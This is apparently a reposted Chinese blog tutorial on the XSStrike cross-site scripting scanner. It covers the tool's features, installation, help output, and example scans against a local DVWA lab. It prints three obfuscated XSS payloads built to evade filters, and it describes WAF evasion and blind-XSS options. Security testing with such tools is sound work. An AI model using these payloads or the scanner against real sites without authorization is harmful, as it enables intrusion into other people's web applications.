码迷,mamicode.com
首页 > 编程语言 > 详细

by python3-XSStrike 测试XSS

时间:2018-12-20 19:07:16      阅读:740      评论:0      收藏:0      [点我收藏+]

标签:注入   bsp   文件   ima   img   message   检测   mes   ams   

一、概述:

XSStrike是一个Cross Site Scripting检测套件,配备四个手写解析器,一个智能有效载荷生成器,一个强大的模糊引擎和一个非常快速的爬虫。

XSStrike不是像其他工具那样注入有效负载并检查其工作,而是通过多个解析器分析响应,然后通过与模糊引擎集成的上下文分析来保证有效负载。以下是XSStrike生成的有效负载的一些示例:

 

}]};(confirm)()//<A%0aONMouseOvER%0d=%0d[8].find(confirm)>z
</tiTlE/><a%0donpOintErentER%0d=%0d(prompt)``>z
</SCRiPT/><DETAILs/+/onpoINTERenTEr%0a=%0aa=prompt,a()//

除此之外,XSStrike还具有爬行,模糊测试,参数发现,WAF检测功能。它还会扫描DOM XSS漏洞。

 

主要特点

  • 反射和DOM XSS扫描
  • 多线程抓取
  • 背景分析
  • 可配置的核心
  • WAF检测和规避
  • 浏览器引擎集成为零误报率
  • 智能负载发生器
  • 手工制作的HTML和JavaScript解析器
  • 强大的模糊引擎
  • 盲人XSS支持
  • 高度研究的工作流程
  • 完整的HTTP支持
  • 来自文件的Bruteforce有效负载
  • PhotonZetanizeArjun提供支持
  • 有效载荷编码

 二、安装:

必须使用pip3安装必要的库:

技术分享图片

git clone  https://github.com/s0md3v/XSStrike.git
cd XSStrike/
pip3 install -r requirements.txt 
python3 xsstrike.py 

	XSStrike v3.1.1


usage: xsstrike.py [-h] [-u target] [--data paramdata] [-e encode] [--fuzzer]
                   [--update] [--timeout timeout] [--proxy] [--params]
                   [--crawl] [--json] [--path] [--seeds args_seeds]
                   [-f args_file] [-l level] [--headers] [-t threadcount]
                   [-d delay] [--skip] [--skip-dom] [-v] [--blind]

optional arguments:
  -h, --help            show this help message and exit
  -u target, --url target
                        url
  --data paramdata      post data
  -e encode, --encode encode
                        encode payloads
  --fuzzer              fuzzer
  --update              update
  --timeout timeout     timeout
  --proxy               use prox(y|ies)
  --params              find params
  --crawl               crawl
  --json                treat post data as json
  --path                inject payloads in the path
  --seeds args_seeds    load crawling seeds from a file
  -f args_file, --file args_file
                        load payloads from a file
  -l level, --level level
                        level of crawling
  --headers             add headers
  -t threadcount, --threads threadcount
                        number of threads
  -d delay, --delay delay
                        delay between requests
  --skip                don‘t ask to continue
  --skip-dom            skip dom checking
  -v, --vectors         verbose output
  --blind               inject blind xss payload while crawling

三、使用

3.1、--fuzzer

python3  xsstrike.py  -v -u "http://192.168.118.132/dvwa/vulnerabilities/xss_r/?name=test#" --fuzzer  --header 

技术分享图片

3.2 盲注XSS

python xsstrike.py -u http://example.com/page.php?q=query --crawl --blind

技术分享图片

 

 

 

 

by python3-XSStrike 测试XSS

标签:注入   bsp   文件   ima   img   message   检测   mes   ams   

原文地址:https://www.cnblogs.com/zhuxr/p/10150555.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!